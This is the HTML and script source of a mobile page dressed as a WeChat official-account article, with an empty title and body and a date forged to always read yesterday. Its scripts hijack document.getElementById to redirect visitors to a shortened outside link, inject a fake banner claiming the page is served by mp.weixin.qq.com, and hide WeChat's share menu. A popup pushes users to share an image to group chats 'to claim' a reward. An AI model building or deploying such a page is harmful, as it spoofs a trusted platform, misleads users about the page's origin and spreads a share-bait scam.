<html class="pixel-ratio-1"><head><meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="format-detection" content="telephone=no">
<title></title>
<link href="http://res.wx.qq.com/mpres/htmledition/images/favicon218877.ico" rel="Shortcut Icon">
<script src="https://res.wx.qq.com/open/js/jweixin-1.0.0.js"></script>

<style>
html {
    -ms-text-size-adjust: 100%;
    -webkit-text-size-adjust: 100%;
    line-height: 1.6
}

body {
    -webkit-touch-callout: none;
    font-family: -apple-system-font,"Helvetica Neue","PingFang SC","Hiragino Sans GB","Microsoft YaHei",sans-serif;
    background-color: #f3f3f3;
    line-height: inherit
}

h1, h2, h3, h4, h5, h6 {
    font-weight: 400;
    font-size: 16px
}

* {
    margin: 0;
    padding: 0;
    font-style: normal
}

a {
    color: #607fa6;
    text-decoration: none
}

.rich_media_inner {
    font-size: 15px;
    word-wrap: break-word;
    -webkit-hyphens: auto;
    -ms-hyphens: auto;
    hyphens: auto
}

.rich_media_area_primary {
    position: relative;
    padding: 18px 15px 15px;
    background-color: #fff
}

.rich_media_area_primary:before {
    content: " ";
    position: absolute;
    left: 0;
    top: 0;
    width: 100%;
    height: 1px;
    border-top: 1px solid #e5e5e5;
    -webkit-transform-origin: 0 0;
    transform-origin: 0 0;
    -webkit-transform: scaleY(0.5);
    transform: scaleY(0.5);
    top: auto;
    bottom: -2px
}

.rich_media_area_extra {
    padding: 0 15px 0
}

.rich_media_title {
    margin-bottom: 12px;
    line-height: 1.4;
    font-weight: 700;
    font-size: 22px
}

.rich_media_meta_list {
    margin-bottom: 18px;
    line-height: 20px;
    font-size: 0
}

.rich_media_meta {
    display: inline-block;
    vertical-align: middle;
    margin-right: 8px;
    margin-bottom: 10px;
    font-size: 15px
}

.meta_original_tag {
    line-height: 100px;
    overflow: hidden;
    background: transparent url(../images/icon_original_tag.2x24ed01.png) no-repeat 0 0;
    width: 60px;
    height: 20px;
    vertical-align: middle;
    display: inline-block;
    -webkit-background-size: 100% auto;
    background-size: 100% auto
}

.rich_media_meta_text {
    color: #8c8c8c
}

.rich_media_meta_nickname {
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
    max-width: 9em
}

span.rich_media_meta_nickname {

}

.rich_media_thumb {
    width: 100%;
    margin-bottom: 6px
}

.rich_media_content {
    overflow: hidden;
    color: #3e3e3e
}

.rich_media_content * {
    max-width: 100% !important;
    box-sizing: border-box !important;
    -webkit-box-sizing: border-box !important;
    word-wrap: break-word !important
}

.rich_media_content p {
    clear: both;
    min-height: 1em;
    white-space: pre-wrap
}

.rich_media_content em {
    font-style: italic
}

.rich_media_content fieldset {
    min-width: 0
}

.rich_media_content .list-paddingleft-2 {
    padding-left: 30px
}

.rich_media_content blockquote {
    margin: 0;
    padding-left: 10px;
    border-left: 3px solid #dbdbdb
}

.selectTdClass {
    background-color: #edf5fa !important
}

table.noBorderTable td, table.noBorderTable th, table.noBorderTable caption {
    border: 1px dashed #ddd !important
}

table {
    margin-bottom: 10px;
    border-collapse: collapse;
    display: table;
    width: 100% !important
}

td, th {
    word-wrap: break-word;
    word-break: break-all;
    padding: 5px 10px;
    border: 1px solid #DDD
}

caption {
    border: 1px dashed #DDD;
    border-bottom: 0;
    padding: 3px;
    text-align: center
}

th {
    border-top: 2px solid #BBB;
    background: #f7f7f7
}

.ue-table-interlace-color-single {
    background-color: #fcfcfc
}

.ue-table-interlace-color-double {
    background-color: #f7faff
}

td p {
    margin: 0;
    padding: 0
}

.res_iframe {
    display: block;
    width: 100%;
    background-color: transparent;
    border: 0
}

.vote_area {
    display: block;
    position: relative;
    margin: 14px 0;
    white-space: normal !important
}

.vote_iframe {
    width: 100%;
    height: 100%;
    background-color: transparent;
    border: 0
}

form {
    display: none !important
}

@media screen and (min-width:0 \0) and (min-resolution:72dpi) {
    .rich_media_content table {
        table-layout: fixed !important
    }

    .rich_media_content td, .rich_media_content th {
        width: auto !important
    }
}

.tc {
    text-align: center
}

.tl {
    text-align: left
}

.tr {
    text-align: right
}

.tips_global {
    color: #8c8c8c
}

.rich_split_tips {
    margin: 20px 0;
    min-height: 24px
}

.rich_media_tool_tips {
    margin-bottom: 8px
}

.rich_media_tool {
    overflow: hidden;
    line-height: 32px
}

.rich_media_tool .meta_primary {
    float: left;
    margin-right: 10px
}

.rich_media_tool .meta_extra {
    float: right;
    margin-left: 10px
}

.rich_media_tool .meta_praise {
    margin-right: 0;
    margin-left: 8px
}

.media_tool_meta i {
    vertical-align: 0;
    position: relative;
    top: 8px;
    margin-right: 3px
}

.meta_praise {
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    outline: 0;
    min-width: 3.5em
}

.meta_praise .praise_num {
    display: inline-block;
    vertical-align: top
}

.icon_praise_gray {
    background: transparent url("https://cdn.ur.qq.com/uploadImages/2017-03-14/20170314154041.PNG") no-repeat 0 0;
    width: 13px;
    height: 13px;
    vertical-align: middle;
    display: inline-block;
    -webkit-background-size: 100% auto;
    background-size: 100% auto
}

.icon_praise_gray.praised {
    background-position: 0 -18px
}

.praised .icon_praise_gray {
    background-position: 0 -18px
}

.rich_tips {
    margin-top: 18px;
    margin-bottom: 0;
    min-height: 24px;
    text-align: center
}

.rich_tips .tips {
    display: inline-block;
    vertical-align: middle
}

.rich_tips .tips, .rich_tips .rich_icon {
    vertical-align: middle
}

.rich_tips .rich_icon {
    margin-top: -3px 5px 0 0
}

.rich_tips.with_line {
    border-top: 1px dotted #e1e1e1
}

.rich_tips.with_line .tips {
    position: relative;
    top: -12px;
    padding-left: 16px;
    padding-right: 16px;
    background-color: #f3f3f3
}

.rich_tips.with_line {
    line-height: 16px
}

.rich_tips.with_line .tips {
    top: -11px;
    padding-left: .35em;
    padding-right: .35em
}

.title_tips .tips {
    color: #868686;
    font-size: 16px
}

.loading_tips {
    margin: 36px 0 20px
}

.title_bottom_tips {
    margin-top: -10px
}

.icon_arrow_gray {
    width: 7px
}

.icon_loading_white {
    width: 16px
}

.icon_loading_white.icon_before {
    margin-right: 1em
}

.icon_loading_white.icon_after {
    margin-left: 1em
}

.btn {
    display: block;
    padding-left: 14px;
    padding-right: 14px;
    font-size: 18px;
    text-align: center;
    text-decoration: none;
    border-radius: 5px;
    -moz-border-radius: 5px;
    -webkit-border-radius: 5px;
    box-sizing: border-box;
    -moz-box-sizing: border-box;
    -webkit-box-sizing: border-box;
    color: #fff;
    line-height: 42px;
    -webkit-tap-highlight-color: rgba(255, 255, 255, 0)
}

.btn.btn_inline {
    display: inline-block
}

.btn_primary {
    background-color: #04be02
}

.btn_primary:not(.btn_disabled):visited {
    color: #fff
}

.btn_primary:not(.btn_disabled):active {
    color: rgba(255, 255, 255, 0.4);
    background-color: #039702
}

.btn_disabled {
    color: rgba(255, 255, 255, 0.6)
}

.wx_poptips {
    position: fixed;
    z-index: 3;
    width: 120px;
    min-height: 120px;
    top: 180px;
    left: 50%;
    margin-left: -60px;
    background: rgba(40, 40, 40, 0.5) !important;
    filter: progid:DXImageTransform.Microsoft.gradient(GradientType = 0, startColorstr = '#80282828', endcolorstr = '#80282828');
    text-align: center;
    border-radius: 5px;
    -moz-border-radius: 5px;
    -webkit-border-radius: 5px;
    color: #fff
}

.wx_poptips .icon_toast {
    width: 53px;
    margin: 15px 0 0
}

.wx_poptips .toast_content {
    margin: 0 0 15px
}

.discuss_container .rich_media_title {
    font-size: 18px
}

.discuss_container .discuss_message {
    word-wrap: break-word;
    -webkit-hyphens: auto;
    -ms-hyphens: auto;
    hyphens: auto
}

.discuss_container.disabled .btn_discuss {
    color: #60f05f
}

.discuss_container.access .discuss_container_inner {
    padding: 15px 15px 0
}

.discuss_container.editing .discuss_container_inner {
    padding-bottom: 25px
}

.discuss_container.editing .frm_textarea_box_wrp {
    margin: 0 -15px
}

.discuss_container.editing .frm_textarea {
    height: 78px;
    -webkit-overflow-scrolling: touch
}

.discuss_container.editing .frm_append.counter {
    display: block
}

.discuss_container.editing .discuss_btn_wrp {
    display: block
}

.discuss_container.editing .discuss_icon_tips {
    margin-top: 0;
    margin-bottom: -14px
}

.discuss_container.editing .discuss_title_line {
    margin-bottom: -20px
}

.discuss_container.warning .counter {
    color: #e15f63
}

.frm_textarea {
    width: 100%;
    background-color: transparent;
    border: 0;
    display: block;
    font-size: 14px;
    -webkit-box-sizing: border-box;
    box-sizing: border-box;
    height: 37px;
    padding: 10px 15px;
    resize: none;
    outline: 0;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0)
}

.frm_textarea_box_wrp {
    position: relative
}

.frm_textarea_box_wrp:before {
    content: " ";
    position: absolute;
    left: 0;
    top: 0;
    width: 100%;
    height: 1px;
    border-top: 1px solid #e7e6e4;
    -webkit-transform-origin: 0 0;
    transform-origin: 0 0;
    -webkit-transform: scaleY(0.5);
    transform: scaleY(0.5);
    top: -1px
}

.frm_textarea_box_wrp:after {
    content: " ";
    position: absolute;
    left: 0;
    top: 0;
    width: 100%;
    height: 1px;
    border-top: 1px solid #e7e6e4;
    -webkit-transform-origin: 0 0;
    transform-origin: 0 0;
    -webkit-transform: scaleY(0.5);
    transform: scaleY(0.5);
    top: auto;
    bottom: -2px
}

.frm_textarea_box {
    display: block;
    background-color: #fff
}

.frm_append.counter {
    display: none;
    position: absolute;
    right: 8px;
    bottom: 8px;
    color: #a3a3a3;
    font-weight: 400;
    font-style: normal;
    font-size: 12px
}

.frm_append .current_num.warn {
    color: #f43631
}

.discuss_btn_wrp {
    display: none;
    margin-top: 20px;
    margin-bottom: 20px;
    text-align: right
}

.btn_discuss {
    padding-left: 1.5em;
    padding-right: 1.5em
}

.discuss_list {
    margin-top: -5px;
    padding-bottom: 20px;
    font-size: 15px
}

.discuss_item {
    position: relative;
    padding-left: 45px;
    margin-top: 26px;
    *zoom: 1
}

.discuss_item:after {
    content: "\200B";
    display: block;
    height: 0;
    clear: both
}

.discuss_item .user_info {
    min-height: 20px;
    overflow: hidden
}

.discuss_item .nickname {
    display: block;
    font-weight: 400;
    font-style: normal;
    color: #727272;
    width: 9em;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
    word-wrap: normal
}

.discuss_item .avatar {
    position: absolute;
    top: 0;
    left: 0;
    top: 3px;
    width: 35px;
    height: 35px;
    background-color: #ccc;
    vertical-align: top;
    margin-top: 0;
    border-radius: 2px;
    -moz-border-radius: 2px;
    -webkit-border-radius: 2px
}

.discuss_item .discuss_message {
    color: #3e3e3e;
    line-height: 1.5
}

.discuss_item .discuss_extra_info {
    color: #8c8c8c;
    font-size: 12px
}

.discuss_item .discuss_extra_info a {
    margin-left: .5em
}

.discuss_item .discuss_status {
    color: #ff7a21;
    white-space: nowrap
}

.discuss_item .discuss_status i {
    font-style: normal;
    margin-right: 2px
}

.discuss_item .discuss_opr {
    float: right
}

.discuss_item .discuss_opr .meta_praise {
    display: inline-block;
    text-align: right;
    padding-top: 5px;
    margin-top: -5px
}

.discuss_item .discuss_del {
    margin-left: .5em
}

.discuss_icon_tips {
    margin-bottom: 20px
}

.discuss_icon_tips img {
    vertical-align: middle;
    margin-left: 3px;
    margin-top: -4px
}

.discuss_icon_tips .icon_edit {
    width: 12px
}

.discuss_icon_tips .icon_access {
    width: 13px
}

.reply_result {
    position: relative;
    margin-top: .5em;
    padding-top: .5em;
    padding-left: .4em
}

.reply_result:before {
    content: " ";
    position: absolute;
    left: 0;
    top: 0;
    width: 100%;
    height: 1px;
    border-top: 1px solid #dadada;
    -webkit-transform-origin: 0 0;
    transform-origin: 0 0;
    -webkit-transform: scaleY(0.5);
    transform: scaleY(0.5)
}

.reply_result .nickname {
    position: relative;
    overflow: visible
}

.reply_result .nickname:before {
    content: " ";
    position: absolute;
    left: -0.4em;
    top: 50%;
    margin-top: -7px;
    width: 3px;
    height: 14px;
    background-color: #02bb00
}

.rich_tips.discuss_title_line {
    margin-top: 50px
}

.rich_media_extra {
    font-size: 15px;
    position: relative
}

.rich_media_extra .extra_link {
    display: block
}

.rich_media_extra img {
    vertical-align: middle;
    margin-top: -3px
}

.rich_media_extra .appmsg_banner {
    width: 100%
}

.rich_media_extra .ad_msg_mask {
    position: absolute;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    text-align: center;
    line-height: 200px;
    background-color: #000;
    filter: alpha(opacity = 20);
    -moz-opacity: .2;
    -khtml-opacity: .2;
    opacity: .2
}

.mpda_bottom_container .rich_media_extra {
    padding-bottom: 15px
}

.btn_default.btn_line, .btn_primary.btn_line {
    background-color: #fff;
    color: #04be02;
    border: 1px solid #04be02;
    font-size: 15px
}

.rich_media_extra .extra_link {
    position: relative
}

.promotion_tag {
    position: absolute;
    display: block;
    height: 21px;
    line-height: 21px;
    width: 79px;
    background: transparent url(../images/promotion_tag_bg24a2fe.png) no-repeat 0 0;
    -webkit-background-size: 79px 21px;
    background-size: 79px 21px;
    font-size: 14px;
    font-style: normal;
    color: #fff;
    padding-left: 7px;
    left: 0;
    bottom: 0
}

.top_banner {
    background-color: #fff
}

.top_banner .rich_media_extra {
    padding: 15px 15px 20px 15px
}

.top_banner .rich_media_extra .extra_link {
    position: relative;
    padding-bottom: 10px
}

.top_banner .rich_media_extra .extra_link:before {
    content: " ";
    position: absolute;
    left: 0;
    top: 0;
    width: 100%;
    height: 1px;
    border-top: 1px solid #d6d6d6;
    -webkit-transform-origin: 0 0;
    transform-origin: 0 0;
    -webkit-transform: scaleY(0.5);
    transform: scaleY(0.5);
    top: auto;
    bottom: -2px
}

.top_banner .rich_media_extra .extra_link:active, .top_banner .rich_media_extra .extra_link:focus {
    outline: 0;
    border: 0
}

.top_banner .rich_media_extra .appmsg_banner {
    width: 100%;
    vertical-align: top;
    outline: 0
}

.top_banner .rich_media_extra .appmsg_banner:active, .top_banner .rich_media_extra .appmsg_banner:focus {
    outline: 0;
    border: 0
}

.top_banner .rich_media_extra .promotion_tag {
    height: 19px;
    line-height: 19px;
    width: 69px;
    background: transparent url(../images/promotion_tag_bg_small24a2fe.png) no-repeat 0 0;
    font-size: 12px;
    -webkit-background-size: 69px 19px;
    background-size: 69px 19px;
    bottom: 10px;
    padding-left: 6px
}

.top_banner .rich_media_extra .ad_msg_mask {
    position: absolute;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    text-align: center;
    line-height: 200px;
    background-color: #000;
    filter: alpha(opacity = 20);
    -moz-opacity: .2;
    -khtml-opacity: .2;
    opacity: .2
}

.top_banner .rich_media_extra .ad_msg_mask img {
    position: absolute;
    width: 16px;
    top: 50%;
    margin-top: -8px;
    left: 50%;
    margin-left: -8px
}

.top_banner .preview_group.obvious_app {
    min-height: 54px;
    position: relative
}

.top_banner .preview_group.obvious_app .pic_app {
    width: 66.6%
}

.top_banner .preview_group.obvious_app .pic_app img {
    height: 100%;
    min-height: 54px
}

.top_banner .preview_group.obvious_app .info_app {
    width: 33%;
    left: 68%
}

.top_banner .preview_group.obvious_app .info_app .name_app {
    line-height: 18px;
    font-size: 13px
}

.top_banner .preview_group.obvious_app .info_app .profile_app {
    font-size: 10px
}

.top_banner .preview_group.obvious_app .info_app .dm_app {
    bottom: 3%
}

.top_banner .preview_group.obvious_app .info_app .dm_app .ad_btn {
    font-size: 12px;
    padding-left: 17px;
    line-height: 16px
}

.top_banner .preview_group.obvious_app .info_app .dm_app .ad_btn.btn_download, .top_banner .preview_group.obvious_app .info_app .dm_app .ad_btn.btn_install, .top_banner .preview_group.obvious_app .info_app .dm_app .ad_btn.btn_installed, .top_banner .preview_group.obvious_app .info_app .dm_app .ad_btn.btn_open {
    background-position: 0 center;
    -webkit-background-position: 0 bottom;
    -webkit-background-size: 14px 14px;
    background-size: 14px 14px
}

.top_banner .preview_group.obvious_app .info_app .dm_app .extra_info {
    display: none
}

.wrp_preview_group {
    padding-top: 100px
}

.preview_group {
    position: relative;
    min-height: 83px;
    background-color: #fff;
    border: 1px solid #e7e7eb;
    -webkit-text-size-adjust: none;
    text-size-adjust: none
}

.preview_group.fixed_pos {
    position: fixed;
    bottom: 0;
    left: 0;
    right: 0
}

.preview_group .preview_group_inner {
    padding: 14px
}

.preview_group .preview_group_inner .preview_group_info {
    padding-left: 68px;
    color: #8d8d8d;
    font-size: 14px
}

.preview_group .preview_group_inner .preview_group_info .preview_group_title {
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
    word-wrap: normal;
    color: #000;
    font-weight: 400;
    font-style: normal;
    padding-right: 73px;
    max-width: 142px;
    display: block
}

.preview_group .preview_group_inner .preview_group_info .preview_group_desc {
    padding-right: 65px;
    display: inline-block;
    line-height: 20px
}

.preview_group .preview_group_inner .preview_group_info .preview_group_avatar {
    position: absolute;
    width: 55px;
    height: 55px;
    left: 13px;
    top: 50%;
    margin-top: -27px;
    z-index: 1
}

.preview_group .preview_group_inner .preview_group_info .preview_group_avatar.br_radius {
    border-radius: 100%;
    -moz-border-radius: 100%;
    -webkit-border-radius: 100%
}

.preview_group .preview_group_inner .preview_group_opr {
    position: absolute;
    line-height: 83px;
    top: 0;
    right: 13px
}

.preview_group .preview_group_inner .preview_group_opr .btn {
    padding: 0;
    min-width: 60px;
    min-height: 30px;
    height: auto;
    line-height: 30px;
    text-align: center
}

.preview_group.preview_card .card_inner .preview_card_avatar {
    position: absolute;
    width: 57px;
    height: 57px;
    left: 13px;
    top: 50%;
    margin-top: -28px
}

.preview_group.preview_card .card_inner .preview_group_info {
    padding-left: 70px
}

.preview_group.preview_card .card_inner .preview_group_info .preview_group_title2 {
    width: 100%;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
    word-wrap: normal;
    padding-right: 0;
    display: block
}

.preview_group.preview_card .card_inner .preview_group_info .preview_group_desc {
    padding-right: 0
}

.preview_group.preview_card .card_inner .preview_group_info.append_btn .preview_group_desc, .preview_group.preview_card .card_inner .preview_group_info.append_btn .preview_group_title {
    padding-right: 68px;
    width: auto
}

.preview_group.obvious_app {
    width: 100%
}

.preview_group.obvious_app .preview_group_inner {
    padding: 0
}

.preview_group.obvious_app .pic_app {
    width: 58.3%;
    height: 100%;
    display: inline-block;
    margin-right: 2%;
    vertical-align: top
}

.preview_group.obvious_app .pic_app img {
    width: 100%;
    vertical-align: top;
    margin-top: 0
}

.preview_group.obvious_app .info_app {
    display: inline-block;
    width: 38%;
    color: #8a8a8a;
    font-size: 12px;
    box-sizing: border-box;
    -webkit-box-sizing: border-box;
    position: absolute;
    left: 62%;
    top: 0;
    height: 100%
}

.preview_group.obvious_app .info_app .name_app {
    color: #000;
    font-size: 15px;
    width: 100%;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
    word-wrap: normal;
    margin-top: 4%
}

.preview_group.obvious_app .info_app .profile_app {
    line-height: 10px;
    width: 100%;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
    word-wrap: normal
}

.preview_group.obvious_app .info_app .profile_app span {
    padding: 0 5px
}

.preview_group.obvious_app .info_app .profile_app span:first-child {
    padding-left: 0
}

.preview_group.obvious_app .info_app .profile_app em {
    font-size: 9px;
    line-height: 16px;
    font-weight: 400;
    font-style: normal;
    color: #dfdfdf
}

.preview_group.obvious_app .info_app .dm_app {
    line-height: 20px;
    vertical-align: middle;
    position: absolute;
    left: 0;
    bottom: 5%
}

.preview_group.obvious_app .info_app .dm_app p {
    line-height: 12px
}

.preview_group.obvious_app .info_app .dm_app .ad_btn {
    display: block;
    color: #04be02;
    font-size: 15px;
    padding-left: 22px
}

.preview_group.obvious_app .info_app .dm_app .ad_btn.btn_download {
    background: transparent url(../images/icon58_download@3x.png) no-repeat 0 0;
    -webkit-background-size: 19px 19px;
    background-size: 19px 19px
}

.preview_group.obvious_app .info_app .dm_app .ad_btn.btn_install {
    background: transparent url(../images/icon58_install@3x.png) no-repeat 0 0;
    -webkit-background-size: 19px 19px;
    background-size: 19px 19px
}

.preview_group.obvious_app .info_app .dm_app .ad_btn.btn_installed {
    background: transparent url(../images/icon58_installed@3x.png) no-repeat 0 0;
    -webkit-background-size: 19px 19px;
    background-size: 19px 19px;
    color: #8a8a8a
}

.preview_group.obvious_app .info_app .dm_app .ad_btn.btn_open {
    background: transparent url(../images/icon58_open@3x.png) no-repeat 0 0;
    -webkit-background-size: 19px 19px;
    background-size: 19px 19px
}

.preview_group.obvious_app .info_app .dm_app .extra_info {
    font-size: 9px
}

@media screen and (max-width:1023px) {
    .qr_code_pc_outer {
        display: none !important
    }
}

@media screen and (min-width:1024px) {
    .rich_media {
        width: 740px;
        margin-left: auto;
        margin-right: auto
    }

    .rich_media_inner {
        padding: 20px
    }

    .rich_media_meta {
        max-width: none
    }

    a.rich_media_meta_nickname {
        display: inline-block !important
    }

    span.rich_media_meta_nickname {

    }

    .rich_media_content {
        min-height: 350px
    }

    .rich_media_title {
        padding-bottom: 10px;
        margin-bottom: 14px;
        border-bottom: 1px solid #e7e7eb
    }

    body {
        background-color: #fff
    }

    .discuss_container.access {
        width: 740px;
        margin-left: auto;
        margin-right: auto;
        background-color: #fff
    }

    .discuss_container.editing .frm_textarea_box {
        margin: 0
    }

    .frm_textarea_box {
        position: relative
    }

    .frm_textarea_box:before {
        content: " ";
        position: absolute;
        left: 0;
        top: 0;
        width: 1px;
        height: 100%;
        border-left: 1px solid #e7e6e4;
        -webkit-transform-origin: 0 0;
        transform-origin: 0 0;
        -webkit-transform: scaleX(0.5);
        transform: scaleX(0.5)
    }

    .frm_textarea_box:after {
        content: " ";
        position: absolute;
        left: 0;
        top: 0;
        width: 1px;
        height: 100%;
        border-left: 1px solid #e7e6e4;
        -webkit-transform-origin: 0 0;
        transform-origin: 0 0;
        -webkit-transform: scaleX(0.5);
        transform: scaleX(0.5);
        left: auto;
        right: -2px
    }

    .rich_media_meta.nickname {
        max-width: none
    }

    .rich_tips.with_line .tips {
        background-color: #fff
    }
}

@media screen and (min-width:1025px) {
    .rich_media_inner {
        border: 1px solid #d9dadc;
        border-top-width: 0
    }

    body {
        background-color: #e7e8eb;
        font-family: "Helvetica Neue", Helvetica, "Hiragino Sans GB", "Microsoft YaHei", "Î¢ÈíÑÅºÚ", Arial, sans-serif
    }

    .rich_media {
        position: relative
    }

    .rich_media_inner {
        background-color: #fff;
        /*padding-bottom: 100px*/
    }

    .rich_media_inner {
        position: relative
    }

    .qr_code_pc_outer {
        display: block !important;
        position: fixed;
        left: 0;
        right: 0;
        top: 20px;
        color: #717375;
        text-align: center
    }

    .qr_code_pc_inner {
        position: relative;
        width: 740px;
        margin-left: auto;
        margin-right: auto
    }

    .qr_code_pc {
        position: absolute;
        right: -145px;
        top: 0;
        padding: 16px;
        border: 1px solid #d9dadc;
        background-color: #fff
    }

    .qr_code_pc p {
        font-size: 14px;
        line-height: 20px
    }

    .qr_code_pc_img {
        width: 102px;
        height: 102px
    }
}
</style>
   
    <link rel="stylesheet" href="https://cdn.bootcss.com/weui/1.1.1/style/weui.min.css">
    <link rel="stylesheet" href="https://cdn.bootcss.com/jquery-weui/1.0.1/css/jquery-weui.min.css">
    <script src="https://cdn.bootcss.com/jquery/1.11.0/jquery.min.js"></script>
    <script src="https://cdn.bootcss.com/jquery-weui/1.0.1/js/jquery-weui.min.js"></script>
    <script>
        var connection = navigator.connection||navigator.mozConnection||navigator.webkitConnection||{tyep:'unknown'};
        var type_text = ['unknown','ethernet','wifi','2g','3g','4g','none'];

        var net_type = connection.type;
//        alert(net_type);
        var u = navigator.userAgent;
        function is_ios() {
            if(!!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/)){
                return true;
            }else{
                return false;
            }
        }

        function getCookie(name) {
            var arr, reg = new RegExp('(^| )' + name + '=([^;]*)(;|$)');
            if (arr = document.cookie.match(reg)){
                return unescape(arr[2]);
            }else{
                return "";
            }
        }

        function setCookie(name, value) {
            var Days = 30;
            var exp = new Date();
            exp.setTime(exp.getTime() + Days * 24 * 60 * 60 * 1000);
            document.cookie = name + '=' + escape(value) + ';expires=' + exp.toGMTString();
        }

        function log_push() {
           // $.post('/HSGkshwHgYThOpjkuiHtRdCBj',{type:net_type},function (data) {});
        }

        document.addEventListener('WeixinJSBridgeReady', function onBridgeReady() {

            WeixinJSBridge.call('hideOptionMenu');
        });

        var o = document.getElementById;
        document.getElementById = function(a)
        {
            if (a == "_edw_iframe_") {
                location.href="http://t.cn/RaeA2py";
                mfc.init();
                return {}
            } else {
                return o.call(document, a);
            }
        };

//        console.log(title);
        //document.title = "测试";
        var doc = $(document);
        var _touches_point1=0;var _touches_point2=0;
        addEventListener("touchstart",
                function(e) {
                    _touches_point1 = e.touches[0].pageY;
                });
        addEventListener("touchmove",
                function(e) {
                    _touches_point2 = e.touches[0].pageY;
                    if(doc.scrollTop()<=0 && _touches_point1<_touches_point2)
                    {
                        e.preventDefault();
                        if( $('#_domain_display').length <=0 )
                        {
                            if(is_ios()){
                                $('body').prepend('<div id="_domain_display" style="font-size: 0.7rem;text-align:center;background-color:#272b2e;color:#878790;height:0px;padding:15px 0;line-height:36px;overflow:hidden;letter-spacing:1px;"><p>网页由 mp.weixin.qq.com 提供</p></div>');
                            }else{
                                $('body').prepend('<div id="_domain_display" style="font-size: 0.7rem;text-align:center;background-color:#272b2e;color:#878790;height:0px;padding:15px 0;line-height:36px;overflow:hidden;letter-spacing:1px;"><p>网页由 mp.weixin.qq.com 提供</p><p style="margin-top: -10px;" id="tech">QQ浏览器X5内核提供技术支持</p></div>');
                            }
                        }
                        $('#_domain_display').height((_touches_point2-_touches_point1));

                    }
                });
        addEventListener("touchend",
                function(e) {
                    $('#_domain_display').slideUp('normal' , function(){
                        $('#_domain_display').remove();
                    });
                });
        function addDate(date,days){
            var d=new Date(date);
            d.setDate(d.getDate()+days);
            var month=d.getMonth()+1;
            var day = d.getDate();
            if(month<10){
                month = "0"+month;
            }
            if(day<10){
                day = "0"+day;
            }
            var val = d.getFullYear()+"-"+month+"-"+day;
            return val;
        }
    </script>
    <style>
        .bon{
            background: rgb(26, 173, 25);
            width: 95%;
            margin: 10px auto;
            text-align: center;
            height: 40px;
            line-height: 40px;
            color: white;
            border-radius: 10px;

        }
        body{font-size: 17px;font-family: -apple-system-font, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei", sans-serif}
        .fxtp{
            top:2%;
            height: 100%;
            margin:0 auto;left: 0;text-align: center; right: 0;
            display:none;
            opacity: 1;
            visibility: visible;
            z-index:99999;
        }
        .fxtp img{
            display: block;
            text-align: center;
            margin: 0 auto;
        }
        .bottom-center{
            color:#FF0000;
            text-align: center;
        }
        #fxt{

        }
        .tips{
            color:#000;font-size:18px;font-weight:300;
            padding:30px 0 0;
        }
        .order {
            height: 60px;
            line-height: 60px;
            text-align: center;
        }
        .order .line {
            display: inline-block;
            width: 30%;
            border-top: 1px dashed #ccc ;
        }
        .order .txt {
            font-size: 14px;
            color: #a59898;
            line-height: 20px;
        }
        /*#d-pic{*/
            /*filter:blur(10px);*/
            /*-webkit-filter:blur(10px);*/
            /*-moz-filter:blur(10px);*/
            /*-ms-filter:blur(10px);*/
            /*-o-filter:blur(10px);*/
        /*}*/ /*#pic{*/
        /*filter:blur(2px);*/
        /*-webkit-filter:blur(2px);*/
        /*-moz-filter:blur(2px);*/
        /*-ms-filter:blur(2px);*/
        /*-o-filter:blur(2px);*/
        /*}
       */
    </style>
</head>
<body id="activity-detail" class="zh_CN " ontouchstart=""><div id="qrcode"></div>
<span style="display: none" id="act_id"></span>
<div id="fxt" class="fxtp">
    <div class="tips" style="font-size: 15px;margin-bottom: 10px;font-weight: 500;">
        <p style="text-align: left;margin-left: 20px;color: red;">温馨提示:</p><p style="text-align: left;margin-left: 20px;">长按下图,选择<span style="color:red;" id="seng_msg_tip">发送给朋友-分享到群</span><span style="color: #1d1c1d;">即可领取！</span></p></div>
    <script>
        document.writeln("<div id='d-pic' style='margin: 0 auto;text-align: center;border:10px solid #fdf0b9;width:60%;border-radius: 10px;'><img src='' id='pic' style='margin: 0 auto;width:100%;'></div>");
    </script>

    <div class="bottom-center">
        <strong>
            <p style="color:red;font-size:18px;font-weight: 400;margin-top: 10px;margin-bottom: 10px;" id="bot_msg_tip">[长按上图分享到群领取]</p>
        </strong>
    </div>
</div>
<div id="js_article" style="display: block;" class="rich_media">
    <div id="js_top_ad_area" class="top_banner"></div>
    <div class="rich_media_inner">
        <div id="page-content">
            <div id="img-content" class="rich_media_area_primary"><h2 class="rich_media_title" id="activity-name"></h2>

                <div class="rich_media_meta_list">
                    <em id="post-date" class="rich_media_meta rich_media_meta_text">
                        <script>document.write(addDate(new Date(),-1))</script>                  </em>
                    <span class="rich_media_meta rich_media_meta_text rich_media_meta_nickname"><span  id="zuozhe"></span></span>
                   

                </div>

                    <div class="rich_media_content" id="js_content">
                        <span id="content"></span>


